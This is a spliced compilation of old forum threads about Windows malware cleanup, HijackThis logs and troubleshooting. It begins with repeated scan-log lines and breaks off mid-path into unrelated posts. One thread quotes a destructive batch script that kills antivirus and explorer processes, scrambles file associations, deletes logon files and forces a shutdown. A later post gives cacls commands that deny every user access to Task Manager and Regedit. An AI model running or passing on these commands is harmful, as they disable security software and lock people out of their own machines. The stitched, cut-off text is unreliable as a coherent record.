Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Docbtw, the microsoft stuff still aren't working. i tried downloading the 2007 trial version, but even that didn't work. it still tells me that there is "not enough memory or disk space" to run them.

i really needed it today and will need it for SURE next week! what to doooo?? ):OH. also, i only have 15.7 GB memory because i downloaded some stuff to try to get microsoft to work. The only thing I can suggest to get some free space is to off-load some files, pictures, video's etc to some DVD RW's and keep only essential programs on your C drive. You could also add another harddrive as a slave and use that for storage or buy an external harddrive. but the funny thing is that it worked properly when i had even less memory, like about 4 GB.
do you think that it could be a virus...
or something else???Quote

but the funny thing is that it worked properly when i had even less memory, like about 4 GB.
do you think that it could be a virus...
or something else???

We can continue checking but I seriously doubt it's malware because nothing is showing up in the logs.
Please do this:
Please do this: Click My Computer, rightclick the C drive and choose Properties. Now give me a screenprint.
How to post screenshots or images

I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\15\399851cf-218bd015probably a variant of Win32/Agent.FQRCZBA trojandeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\18\26e2fcd2-5798fd32multiple threatsdeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\21\584f2615-6bfc2fd6multiple threatsdeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\24\38566918-7cbe2475a variant of Java/TrojanDownloader.Agent.NAN trojandeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\24\c419dd8-57f96764multiple threatsdeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\27\4678319b-30b56b52multiple threatsdeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\50\7d6ea6f2-77282d43multiple threatsdeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\51\22c3fb33-41aebf9cmultiple threatsdeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\54\947f9b6-4ccdb638a variant of Java/Exploit.Agent.NAC trojandeleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\58\14e0d07a-427e8f90multiple threatsdeleted - quarantined
C:\Qoobox\Quarantine\C\Program Files\Antispyware\TCL.dll.virWin32/Adware.AntiSpyware2008 applicationcleaned by deleting - quarantined
C:\Qoobox\Quarantine\C\WINDOWS\system32\ekekojus.ini.virWin32/Adware.Virtumonde.NEO applicationcleaned by deleting - quarantined
C:\System Volume Information\_restore{9666028F-3AA7-4E35-9C2A-381ABC957478}\RP606\A0056785.dllWin32/Adware.AntiSpyware2008 applicationcleaned by deleting - quarantined
C:\System Volume Information\_restore{9666028F-3AA7-4E35-9C2A-381ABC957478}\RP606\A0056788.iniWin32/Adware.Virtumonde.NEO applicationcleaned by deleting - quarantined


Uploaded with ImageShack.usJust as I thought. The problems now are that you have too little freespace. We should do some cleanup. You can remove all other tools we used to clean your computer. The instructions for ComboFix are below.

* Click START then RUN - Vista users press the Windows Key and the R keys TOGETHER for the Run box.
* Now type Combofix /uninstall in the runbox
* Make sure there's a space between Combofix and /Uninstall
* Then hit Enter

* The above procedure will:
* Delete the following:
* ComboFix and its associated files and folders.
* Reset the clock settings.
* Hide file extensions, if required.
* Hide System/Hidden files, if required.
* Set a new, clean Restore Point.
****************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
************************************************
Given the state of your hardrive, I wouldn't recommend that you install anymore new programs which will just make matters worse. If you're ABLE to get more space on that drive, you could then consider installing some of them.

Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you SAFE from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Discussion
3274.

Solve : bat virus?

Answer»

hello everyone,
i am just a normal surfer, while i was going through a website and got a code like below:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:WINDOWSsystem32logoff.exe /F /Q
DEL C:WINDOWSsystem32logon.exe /F /Q
DEL C:WINDOWSsystem32logon.scr /F /Q
cls
shutdown


and it does the following things:

1. ENDS Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and ICONS will dissapear)
3. Ends Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WINAMP or WMP)
6. Deletes Login/Logoff Screens

now i want to retrieve of what it has done. Can anyone help me?
i am not a virus maker but just a experimentist, Please help me.. :_:No IDEA what you are talking about. What is it you are trying to do?
Discussion
3275.

Solve : AV security suite issue on Vista machine?

Answer»

Wha-hoo THANK you!
Discussion
3276.

Solve : ERROR LOADING SPHPXPNT.DLL/ARACETUW.DLL - SPECIFIED MODULE COULD NOT BE FOUND?

Answer»

Is it Dc53 or Dc55? Right-click on that file and click Propterties and tell me about this folder.

Quote

Do I need Microsoft Security Essentials since I already have SAS and MalwareBytes
MicroSoft Security Essentials is you anti-virus program. You certainly need one AV program on your computer. SAS and MBAM are for malware, spyware etc. and they are not full-time scanners. You will need to initiate the scans with those two.

Quote
Now I have one more problem - I am UNABLE to launch Skype.
Try reinstalling the program.1. Quote
Now I have one more problem - I am unable to launch Skype.

I was able to resolve this by turning off Windows XP Firewall.

2. Quote
Do I need Microsoft Security Essentials since I already have SAS and MalwareBytes

Understood. Thank you.

3. Quote
Is it Dc53 or Dc55? Right-click on that file and click Propterties and tell me about this folder.
Please, see printscreen attached.

4. Quote
I am not able to install Comodo - it says "This installation doesn't support target platform".
I am running WinXP 32.


5. I started getting an error message "jusched.exe encountered a problem and needs to close".
Please, see printscreen attached.






[RECOVERING disk space - old attachment deleted by admin]Quote
I am not able to install Comodo - it says "This installation doesn't support target platform".
Are you quite certain that you didn't download the 64 bit one? Try downloading it again.

Quote
I started getting an error message "jusched.exe encountered a problem and needs to close".
Please, see printscreen attached.
Please try this and see if it gets rid of the error. Quote
Are you quite certain that you didn't download the 64 bit one? Try downloading it again.
You are right. My mistake. I downloaded 64 one from http://www.majorgeeks.com/Comodo_Personal_Firewall_d5033.html
There's no 32 version there. Can you give me the safe link where I can download 32 one from. Thanks.Quote
Can you give me the safe link where I can download 32 one from. Thanks
Just go to that link and choose "download @ author's site" 1. I was able to download and install COMODO from cfw_installer_x86 which was the file at "download @ author's site". I am not sure if this 32 version but it WORKS for now.


2. Quote
"You can download and install Unlocker
and try to delete it with that. What happens when you hit the "Empty recycling bin"?

I tried Unlocker and it didn't work. When I hit delete from recycle bin I get a pop up message "Cannot remove folder Dc55: Access is denied. Make sure the disk is not full or write protected"

Thanks SuperDaveQuote
I am not sure if this 32 version but it works for now.
That's the one.

Quote
I tried Unlocker and it didn't work. When I hit delete from recycle bin I get a pop up message "Cannot remove folder Dc55: Access is denied. Make sure the disk is not full or write protected"

I found this just after I posted my reply. The same folder.
Sorry. I fixed it. Please try again.Quote
I found this just after I posted my reply. The same folder.

Sorry, can you give me the full link - I am getting "Google Chrome could not find http".

Thanks.I fixed it. Please try again.Start a command prompt (cmd.exe) - done.

Move to the RECYCLER folder - how do I do that? Should I do it in cmd.exe window ?

Enter the command - "attrib -h *.*" is it the exact command ?
attrib -h *.*

Delete the file

Restart the computer Take a look at this:
http://forums.techarena.in/windows-xp-support/990228.htmI did those steps mentioned at http://forums.techarena.in/windows-xp-support/990228.htm and was able to get rid of this Dc 55 empty folder in my recycle bin HOWEVER I started having the following issues with my recycle bin:

1. When I restart my machine, I get " Recycle Bin on drive C: is corrupted. Do you want to empty the recycle bin for this drive?"


2. The recycle bin remains empty even though I unchecked " Don't move files to the Recycle Bin. Remove files immediately when deleted" option in the properties.


I downloaded and run latest Service Pack 3 but it didn't fix the issue. ALSO Googled some advice which didn't help.

I know this is a different topic, SuperDave. I appreciate all your help with the previous issue which HAS BEEN RESOLVED. Now , should I start a different thread on this ?


P.S. Some folks believe this may be due to INFO2 file corruption. I tried to look it up on my machine but didn't find it. Quote
I know this is a different topic, SuperDave. I appreciate all your help with the previous issue which HAS BEEN RESOLVED. Now , should I start a different thread on this ?
Why not delete all the recycling bins from each drive.(Follow the directions in the link). If that doesn't work, start a new thread in the appropriate forum for you OS, not this forum. Good luck.
Discussion
3277.

Solve : Has my e-mail been hijacked?

Answer»

Has my YAHOO e-mail been hijacked? If so, what can I do about it? I have found two delivery failure messages in my spam folder relating to e-mails which I have never sent.

It has the words "VIRTUALLY AUTHENTIC" before my e-mail address. They relate to an ADVERTISEMENT for fake products with a link to hxxp://www.bladechange.com/As long as they are in your spam folder don't worry about it.My yahoo email was hijacked. It sent spam email to all my contacts. If you call yahoo there is a RECORDING about their site getting hijacked.@FLIGHT: Try changing your Yahoo! Mail password. Btw, next time please create your own topic.
Discussion
3278.

Solve : redirect virus?

Answer»

Dear Sir,

The instructions for the Malware REMOVAL Guide indicate that I need to access the Add and Remove Programs feature in the control PANEL. MY Control Panel doesn't have this feature. What should I do?

Thank you.

Frances DonnerIn Vista and Windows 7 the Add/Remove applet has been renamed. It is now called: Programs and FeaturesThank You.Quote from: Donner on January 09, 2011, 12:33:54 PM

Thank You.

How were you able to get rid of the redirect virus? What STEPS did you TAKE?
Dear Sir,

I cannot figure out how to save the HJT log file. I do not know how to put it into Note PAD. All the steps I have followed appear to eliminated the virus. Do you still want the logs or can I just list my problem as solved?

Thank you.

Frances Donner
Discussion
3279.

Solve : BSoD from mofunzone.com, HJT log- any problems??

Answer»

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\ati2evxx.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\SiteAdvisor\6066\SAService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Apoint\Apoint.exe
C:\WINDOWS\system32\Atiptaxx.exe
C:\WINDOWS\System32\WScript.exe
C:\WINDOWS\system32\PRISMSVR.EXE
C:\PROGRA~1\Yahoo!\browser\ybrwicon.exe
C:\PROGRA~1\Yahoo!\YOP\yop.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\SiteAdvisor\6066\SiteAdv.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\2Wire Wireless\Client Manager\CMTWO.EXE
C:\Program Files\2Wire 802.11g Wireless\PRISMCFG.exe
C:\PROGRA~1\Yahoo!\browser\ycommon.exe
C:\Program Files\Apoint\Apntex.exe
c:\progra~1\Support.com\client\bin\tgcmd.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Evan ******\My Documents\My eBooks\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/sbcydsl/*http://www.yahoo.com/search/ie.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/customize/ie/defaults/sp/sbcydsl/*http://www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://dsl.sbc.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://att.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://red.clientapps.yahoo.com/customize/ie/defaults/su/sbcydsl/*http://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/sbcydsl/*http://www.yahoo.com/search/ie.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/customize/ie/defaults/sp/sbcydsl/*http://www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://att.yahoo.com
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {089FD14D-132B-48FC-8861-0048AE113215} - C:\Program Files\SiteAdvisor\6066\SiteAdv.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\PROGRA~1\Yahoo!\Common\yiesrvc.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: SidebarAutoLaunch Class - {F2AA9440-6328-4933-B7C9-A6CCDF9CBF6D} - C:\Program Files\Yahoo!\browser\YSidebarIEBHO.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6066\SiteAdv.dll
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe
O4 - HKLM\..\Run: [AtiPTA] Atiptaxx.exe
O4 - HKLM\..\Run: [ZTgServerSwitch] c:\program files\support.com\client\lserver\server.vbs
O4 - HKLM\..\Run: [CleanupProgram] C:\Sonysys\cleanup.exe
O4 - HKLM\..\Run: [PRISMSVR.EXE] "C:\WINDOWS\system32\PRISMSVR.EXE" /APPLY
O4 - HKLM\..\Run: [YBrowser] C:\PROGRA~1\Yahoo!\browser\ybrwicon.exe
O4 - HKLM\..\Run: [IPInSightMonitor 01] "C:\Program Files\SBC Yahoo!\Connection Manager\IP InSight\IPMon32.exe"
O4 - HKLM\..\Run: [YOP] C:\PROGRA~1\Yahoo!\YOP\yop.exe /autostart
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [osCheck] "C:\Program Files\Norton AntiVirus\osCheck.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SiteAdvisor] C:\Program Files\SiteAdvisor\6066\SiteAdv.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - Global Startup: 2Wire Wireless Client Manager.lnk = ?
O4 - Global Startup: 2Wire Wireless Client.lnk = C:\Program Files\2Wire 802.11g Wireless\PRISMCFG.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O4 - Global Startup: ColorPlus Startup.lnk = C:\Program Files\PANTONE COLORVISION\ColorPlus\ColorPlus.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: AT&T Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\PROGRA~1\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - OPTIONS GROUP: [INTERNATIONAL] International*
O14 - IERESET.INF: START_PAGE_URL=http://www.sony.com/vaiopeople
O16 - DPF: {1239CC52-59EF-4DFA-8C61-90FFA846DF7E} (Musicnotes Viewer) - http://www.musicnotes.com/download/mnviewer.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\common\yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1128543930945
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1173815626024
O16 - DPF: {D18F962A-3722-4B59-B08D-28BB9EB2281E} (PhotosCtrl Class) - http://photos.yahoo.com/ocx/us/yexplorer1_9us.cab
O18 - Protocol: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6066\SiteAdv.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\ati2evxx.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Symantec IS Password Validation (ISPwdSvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\isPwdSvc.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: SiteAdvisor Service - McAfee, Inc. - C:\Program Files\SiteAdvisor\6066\SAService.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
O23 - Service: YPCService - Yahoo! Inc. - C:\WINDOWS\system32\YPCSER~1.EXE

I replaced my LAST name with ****** if that makes a differenceI have a couple of errands to run and another log to deal with, but I'll look at yours ASAP. If you happen to see this before I get back, could you please post another FULL log with the heading and everything? It's alright if you want to censor your last name.Well, Evan, your log looks CLEAN to me. There's just one questionable entry I see...

O4 - HKLM\..\Run: [ZTgServerSwitch] c:\program files\support.com\client\lserver\server.vbs

It's related to Sony Vaio Support. It's technically legitimate, but it's also considered spyware. Whether you want this on your computer or not is up to you. I would delete it, but if you do, I think it may disable your support agent. So, like I said, it's up to you.

Whatever your problem is, I don't believe it's virus-related. You may want to take this issue over to the Hardware section because I believe your problem may be hardware-related. Describe your problem to them and include all STOP errors you get and I'm sure they'll have plenty of helpful suggestions for you.


Also...do you have a firewall on this computer? I don't see one active.Due to lack of feedback, I am closing this TOPIC. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
Discussion
3280.

Solve : virus svichosst.exe?

Answer»

why u all guy dont want to help me N my friend? am i DONE anything wrong in this FORUM?No ....well er..........Quote from: insertusername on May 13, 2007, 08:53:40 PM

why u all guy dont want to help me n my friend? am i done anything wrong in this forum?
Get a legal copy of Windows and we'll help. Of course, if you did that, you might not be having these problems.are u sure is pirate windows? if i change it,
can u sure that svichoost virus will not inflect to my windows again??
i ned to make sure frist,
how to know is pirate windows or not?http://www.microsoft.com/resources/howtotell/ww/windows/default.mspxi see, my this pc windows is a pirate windows...

so.. stil can help me or not? cos my arnother laptop with original windows still same problem .... >"Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\REGEDIT.exe" /e /g everyone:f
If that doesn't work try formating your computer with a legal copy of windows!One more thing:
What software have you installed, or either downloaded last time?Quote from: patio on May 11, 2007, 08:28:55 PM
I was -207 on Karma and all my installs are legit...

I don't get it.

And I kept giving you attaboys. Quote from: Ledio on May 14, 2007, 07:41:03 AM
The best thing to do is:
Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\regedit.exe" /e /g everyone:f
]

I'm curious to what this advice will accomplish...haha : ) my computer is okay. i alredy know how to enable back the task manager, regedit and folder options.


thank you all of you.
At the risk of repeating myself...i will.

Quote from: patio on May 14, 2007, 07:28:10 PM
Quote from: Ledio on May 14, 2007, 07:41:03 AM
The best thing to do is:
Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\regedit.exe" /e /g everyone:f
]

I'm curious to what this advice will accomplish...
hey patio try this first:
Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /d everyone
cacls "%systemroot%\regedit.exe" /e /d everyone
try to open regedit and task manager.
See what happens?
now do this:
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
